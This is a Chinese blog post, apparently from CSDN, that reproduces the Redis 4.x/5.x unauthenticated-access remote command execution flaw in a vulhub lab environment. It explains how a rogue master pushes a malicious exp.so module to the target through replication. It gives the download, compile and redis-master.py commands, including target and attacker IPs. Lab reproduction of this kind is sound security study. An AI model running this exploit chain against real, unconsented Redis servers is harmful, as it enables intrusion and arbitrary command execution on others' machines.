【redis-rce】Redis 4.x/5.x 未授权访问-远程命令执行漏洞

最新推荐文章于 2024-04-24 20:09:33 发布
最新推荐文章于 2024-04-24 20:09:33 发布
阅读量578 收藏 1
点赞数
分类专栏: 安全测试 安全漏洞 python 文章标签: redis python 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013908944/article/details/111240323
版权
安全测试 同时被 3 个专栏收录
22 篇文章 0 订阅
订阅专栏
python
20 篇文章 0 订阅
订阅专栏
安全漏洞
11 篇文章 0 订阅
订阅专栏

漏洞参考:
https://vulhub.org/#/environments/redis/4-unacc/
https://github.com/vulhub/redis-rogue-getshell
漏洞原理:
Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
下载exp代码,本地编译后生成exp.so 的库文件,然后通过redis未授权可以配置主从同步功能修改主服务器的地址为存放exp.so的地址,利用同步功能将exp.so链接库同步到失陷主机上,然后通过exp.so调用系统函数执行命令。
漏洞复现:

docker-compose up -d

wget https://github.com/vulhub/redis-rogue-getshell/archive/master.zip
unzip master.zip
cd redis-rogue-getshell-master/
 cd RedisModulesSDK/
 make

python3 redis-master.py -r 10.12.140.222 -p 6379 -L 172.16.75.135 -P 8881 -f RedisModulesSDK/exp.so -c "ifconfig"

在这里插入图片描述

弘毅密令
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis漏洞复现——Redis 4.x/5.x 授权访问漏洞
Aquarius_ego的博客
03-30 4476
Redis 4.x/5.x 授权访问漏洞复现
Redis-主从复制
shui2104的博客
09-27 226
Redis-主从复制 ​ 为了避免单点Redis服务器故障,准备多台服务器,相互连通。将数据多个副本保存在不同的服务器上,连接在一起,并保证数据是同步的。即使其中某一台服务器宕机,其他服务器依然可以继续提供服务,实现Redis的高可用,同时实现数据冗余备份。 ​ 主从复制即将master中的数据有效及时的复制到slave中。一个master可以对应多个slave,一个slave只能对应一个master。 master:复制写数据,执行写操作时,将出现变化的数据自动同步到slave。读数据的操作基本可忽略
redis-rce:Redis RCE 的几种方法
04-15
redis-rce Redis RCE 的几种方法 文章请参考
ubuntu redis: unrecognized service
努力!奋斗!
04-21 3270
service 服务识别不了redis 要不没安装 或者安装了名字不是这个 可以用service --status-all 查看一下支持的服务 我这里就是redis-server 然后再sudo service redis-server start 成功
Redis-4-unacc授权访问漏洞复现(一看就会)
m0_69043895的博客
04-24 871
Redis是一个开源的内存数据库,它以键值对的方式存储数据。以下是关于 Redis 的主要特点和用途:内存存储,键值存储,持久性,数据结构支持。默认端口为6379。Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问
RedisTemplate连接不释放导致服务异常
EricXiao666的博客
05-24 4185
最近在给一个项目做压测,刚开始时很正常,过一会服务就无法正常访问了,停止了压测任务再调用接口也同样没有响应,经排查是redis连接池没有释放导致的。 解决方法: 方法一:全局关闭事务 找到redis配置,将 enableTransactionSupport 配置项去掉或设置为false 方法二:RedisTemplate操作后手动释放连接 RedisConnectionUtils.unbindConnection(redisTemplate.getConnectionFactory()); 注意:使用
Redis遇到的那些坑
WriteOnRead
02-05 295
前言 Redis 作为当前最流行的 NoSQL 之一,想必很多人都用过。Redis 有五种常见的数据类型:string、list、hash、set、zset。讲真,我以前只用过 Redi...
Java的新项目学成在线笔记-day17(十三)
beiqiang1641的博客
08-08 90
5 身份校验 5.1 需求分析 本小节实现网关连接Redis校验令牌:1、从cookie查询用户身份令牌是否存在,不存在则拒绝访问2、从http header查询jwt令牌是否存在,不存在则拒绝访问3、从Redis查询user_token令牌是否过期,过期则拒绝访问5.2 编码代码 1、配置application.yml配置 redis链接参数: [mw_shl_code=applescript,...
Python库 | tencentcloud-sdk-python-rce-3.0.514.tar.gz
03-11
Tencentcloud-sdk-python-rce库的核心功能在于远程代码执行(RCE,Remote Code Execution)。在软件开发中,RCE能力允许开发者在运行时执行任意代码,这在自动化任务、系统管理以及云服务控制等方面具有极大的价值。...
datapower-redis-rce-exploit:用于IBM Datapower身份验证的Redis RCE的POC滥用测试消息功能(CVE-2020-5014)
03-09
datapower-redis-rce-exploit(CVE-2020-5014) 用于IBM ...快速开始克隆此仓库编译模块: cd RedisModulesSDK/dpredisshell/ make 编译Golang代码go build 检查标志./datapower-redis-rce-exploit -h 运行漏洞
Python-通过Redis和CSRF获取RCE的一个示例
08-10
3. **结合CSRF**:攻击者创建一个带有恶意Redis命令的URL,诱导用户点击,Web应用在处理请求时无意间触发了Redis命令执行,从而实现RCE。 **防范策略** 1. **限制Redis访问**:配置Redis仅接受来自特定IP地址的...
openresty-1.23.0.1.tar.gz
08-03
2022年4月11日, NGINX发布安全公告,修复了一个NGINX LDAP参考实现中的一个代码执行漏洞漏洞编号:暂无,漏洞威胁等级:高危。 当满足以下一个或多个条件时,会出现此问题: ①命令行参数用于配置 nginx-ldap-...
Redis授权访问漏洞复现
yangbz123的博客
01-29 3915
Redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新
[Vulhub] Redis 4.x/5.x 授权访问漏洞
weixin_45605352的博客
07-16 2684
0x00 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /roo
Redis 4.x5.x 授权访问漏洞Redis基于主从复制的RCE)
黑白的博客
12-06 1893
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
unauthenticated user连接问题
渔夫数据库笔记
03-17 1443
1.版本 1)操作系统  cat /etc/issue Red Hat Enterprise Linux Server release 5.5 (Tikanga) Kernel \r on an \m  cat /proc/version Linux version 2.6.32-504.el6.x86_64 (mockbuild@c6b9.bsys.dev.cento
Redis 授权访问缺陷
我心如水
06-19 1万+
昨天接到一个开发朋友的求助说是有一个异常的进程占用了将近百分之800(8核)cpu使用率,于是登录服务器查看,确实有一个异常进程,通过ps查到了该进程调用的脚本,继而继续追踪后门定时任务,确实都存在,通过后门定时任务找到了攻击的最终源头,起因便是redis授权漏洞造成,下面公布一下该攻击脚本: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/
17-身份校验-身份校验过虑器编写
minihuabei的博客
08-20 146
使得原来的过滤器失效 方法1: 注释@Component 方法2:shouldFilter改为return false; 5 身份校验 5.1 需求分析 本小节实现网关连接Redis校验令牌: 1、从cookie查询用户身份令牌是否存在,不存在则拒绝访问 2、从http header查询jwt令牌是否存在,不存在则拒绝访问 3、从Redis查询user_token令牌是否过期,过期则拒绝访问 5.2 编码代码 1、配置application.yml 配置 redis链接参数: 2、使用StringRed
Shiro使用redis作为缓存(解决shiro频繁访问Redis)(十一)
热门推荐
这个名字想了很久
09-03 6万+
原文地址,转载请注明出处:&amp;amp;nbsp;https://blog.csdn.net/qq_34021712/article/details/80791219&amp;amp;nbsp;&amp;amp;nbsp; &amp;amp;nbsp;&amp;amp;nbsp;©王赛超&amp;amp;nbsp; 之前写过一篇博客,使用的一个开源项目,实现了redis作为缓存 缓存用户的权限 和 session信息,还有两个功能没有修改,一个是用户并发
redis-6.-bash: ./bin/redis-server: No such file or directory
最新发布
05-04
关于你提到的错误信息"bash: ./bin/redis-server: No such file or directory",这通常表示你在执行redis-server命令时找不到对应的文件或目录。可能的原因有以下几种: 1. Redis-6正确安装:请确保你已经正确地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值